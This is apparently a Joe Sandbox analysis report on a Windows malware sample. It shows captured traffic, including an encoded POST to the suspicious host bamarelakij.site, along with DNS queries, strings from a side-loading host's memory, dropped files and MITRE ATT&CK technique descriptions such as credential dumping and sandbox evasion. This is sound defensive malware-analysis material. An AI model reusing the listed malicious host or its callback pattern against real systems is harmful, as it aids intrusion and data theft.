Source: global traffic	HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37AContent-Length: 35Host: bamarelakij.site

Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1736430155824&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0CF28CAF1D4764FC3C1D99C01CEF65B6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1736430155823&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8c5c06be53d4ef49888d26564492b1c&activityId=a8c5c06be53d4ef49888d26564492b1c&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b2?rn=1736430155824&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0CF28CAF1D4764FC3C1D99C01CEF65B6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=157707f961a726cd94781461736430158; XID=157707f961a726cd94781461736430158
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1736430155823&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8c5c06be53d4ef49888d26564492b1c&activityId=a8c5c06be53d4ef49888d26564492b1c&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=23380C341E47475980EC0B27EFDB0DFE&MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; SM=T; _C_ETH=1; msnup=

Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View	IP Address: 13.89.178.27 13.89.178.27
Source: Joe Sandbox View	IP Address: 20.110.205.119 20.110.205.119

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45

Source: RescueCDBurner.exe, 00000004.00000002.1725993720.000000006D2A9000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: B)mQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: RescueCDBurner.exe, 00000003.00000002.1665622100.000000006CF79000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: lQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: bamarelakij.site
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 24EPV9vjc5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\003849b8-effd-4de1-8b54-e33556127a52.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2adced15-92fa-4423-9806-96149f51e7a9.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\43c0e4d6-63b9-418c-9513-0c2a3fb77c5f.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6cb7b0d2-0ecc-4c82-91c4-a9bd5d7e87ba.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\c9a0a03b-0faa-4915-bd81-756dad03adea.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD241-1670.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD242-19C0.pma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\35db2c39-a6e0-4838-b0b6-89924e116302.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3a7eecc7-33c6-4281-ad0a-edd0b3625cd3.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\51cacb55-a3cb-451d-b6bf-a7b5b6496cd7.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5b62955e-5504-4928-b056-ea0049b31c85.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5cb5f8fa-a822-42ea-b018-683827ed063d.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\68e1d420-a77e-4069-8580-8386bdb4288e.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

Windows Analysis Report
24EPV9vjc5.exe

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
